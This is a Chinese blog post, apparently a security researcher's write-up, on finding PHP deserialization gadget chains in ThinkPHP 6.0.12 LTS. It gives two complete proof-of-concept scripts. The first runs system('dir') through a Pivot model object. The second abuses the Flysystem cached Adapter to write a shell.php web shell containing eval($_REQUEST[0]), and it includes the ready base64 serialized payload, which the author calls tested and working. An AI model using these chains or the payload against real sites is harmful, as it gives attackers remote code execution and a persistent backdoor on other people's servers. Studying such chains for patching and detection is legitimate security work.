6.0.12LTS的反序列化链寻找

6.0.12LTS的反序列化链寻找

按照以往

我通过搜索发现框架中是有两个可用的__destruct函数的,之前一直用的都是从vendor/topthink/think-orm/src/Model.php:1063触发的调用链

image-20220915183818219

Pivot就是Model的唯一实现类,所以最后就是以Pivot作为触发点了

POC1:

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['dir']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

Adapter

而除了这个之外还注意到了另一个__destruct函数, 代码并不复杂调用链也很短, 所以就直接跟了一下发现确实是可行的,下面就一起看看吧

(虽然这个链子网上也有出现过很多次,但是一直都是复制粘贴没注意, 现在自己意外发现所以还是记录一下吧就当是TP的学习了)

vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php:28

image-20220915184114657

随后我跟进去看了一下发现这个其实也是可行的,虽然后面实现save的类有很多

image-20220915184201353

但是其实只有\League\Flysystem\Cached\Storage\Adapter::save是可用的,其他的全都是一些数据库的缓存处理和结束工作,下面是Adapter::save的代码

    /**
     * {@inheritdoc}
     */
    public function save()
    {
        $config = new Config();
        $contents = $this->getForStorage();
        if ($this->adapter->has($this->file)) {
            $this->adapter->update($this->file, $contents, $config);
        } else {
            $this->adapter->write($this->file, $contents, $config);
        }

    }

image-20220915184308557

这个链子是可行的并且也不复杂, 随后我构造了一下POC(已测可行)

POC2:

<?php
namespace League\Flysystem{
    interface ReadInterface
    {
    }
}
namespace League\Flysystem\Cached{
    use League\Flysystem\ReadInterface;

    interface CacheInterface extends ReadInterface
    {
    }
}
namespace League\Flysystem\Cached\Storage{
    use League\Flysystem\Cached\CacheInterface;

    abstract class AbstractCache implements CacheInterface
    {

    }
}

//--------------------------------------------------
namespace League\Flysystem{
    interface AdapterInterface extends ReadInterface
    {
    }
}
namespace League\Flysystem\Adapter{
    use League\Flysystem\AdapterInterface;
    abstract class AbstractAdapter implements AdapterInterface
    {
    }
    use League\Flysystem\Config;
    class Local extends AbstractAdapter
    {
        public function write($path, $contents, Config $config)
        {
            // TODO: Implement write() method.
        }

        public function writeStream($path, $resource, Config $config)
        {
            // TODO: Implement writeStream() method.
        }

        public function update($path, $contents, Config $config)
        {
            // TODO: Implement update() method.
        }

        public function updateStream($path, $resource, Config $config)
        {
            // TODO: Implement updateStream() method.
        }

        public function rename($path, $newpath)
        {
            // TODO: Implement rename() method.
        }

        public function copy($path, $newpath)
        {
            // TODO: Implement copy() method.
        }

        public function delete($path)
        {
            // TODO: Implement delete() method.
        }

        public function deleteDir($dirname)
        {
            // TODO: Implement deleteDir() method.
        }

        public function createDir($dirname, Config $config)
        {
            // TODO: Implement createDir() method.
        }

        public function setVisibility($path, $visibility)
        {
            // TODO: Implement setVisibility() method.
        }

        public function has($path)
        {
            // TODO: Implement has() method.
        }

        public function read($path)
        {
            // TODO: Implement read() method.
        }

        public function readStream($path)
        {
            // TODO: Implement readStream() method.
        }

        public function listContents($directory = '', $recursive = false)
        {
            // TODO: Implement listContents() method.
        }

        public function getMetadata($path)
        {
            // TODO: Implement getMetadata() method.
        }

        public function getSize($path)
        {
            // TODO: Implement getSize() method.
        }

        public function getMimetype($path)
        {
            // TODO: Implement getMimetype() method.
        }

        public function getTimestamp($path)
        {
            // TODO: Implement getTimestamp() method.
        }

        public function getVisibility($path)
        {
            // TODO: Implement getVisibility() method.
        }
    }
}
//--------------------------------------------------
namespace League\Flysystem\Cached\Storage{
    use League\Flysystem\AdapterInterface;
    use League\Flysystem\Adapter\Local;
    class Adapter extends AbstractCache
    {
        public function __construct(){
            $this->autosave=false;
            $this->cache=array('<?phpinfo();eval($_REQUEST[0]);?>');
            $this->file="shell.php";
            $this->adapter=new Local();
        }
    }
}
namespace {
    use League\Flysystem\Cached\Storage\Adapter;
    print_r(
        base64_encode(
            serialize(
                new Adapter()
            )
        )
    );
}
//TzozOToiTGVhZ3VlXEZseXN5c3RlbVxDYWNoZWRcU3RvcmFnZVxBZGFwdGVyIjo0OntzOjg6ImF1dG9zYXZlIjtiOjA7czo1OiJjYWNoZSI7YToxOntpOjA7czozMzoiPD9waHBpbmZvKCk7ZXZhbCgkX1JFUVVFU1RbMF0pOz8+Ijt9czo0OiJmaWxlIjtzOjk6InNoZWxsLnBocCI7czo3OiJhZGFwdGVyIjtPOjMwOiJMZWFndWVcRmx5c3lzdGVtXEFkYXB0ZXJcTG9jYWwiOjA6e319

执行后写入一个shell.php文件

image-20220915184611982

image-20220915184639039

总的来说

他们都是通过save函数实现代码写入,并且后面都是只有唯一一条的路径可行,所以并没有太多其他的拓展和变种了

以下两触发类的析构作为起点:

  1. \League\Flysystem\Cached\Storage\Adapter
  2. \think\model\Pivot

注: 找了下__wakeup没找到啥有用的...

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇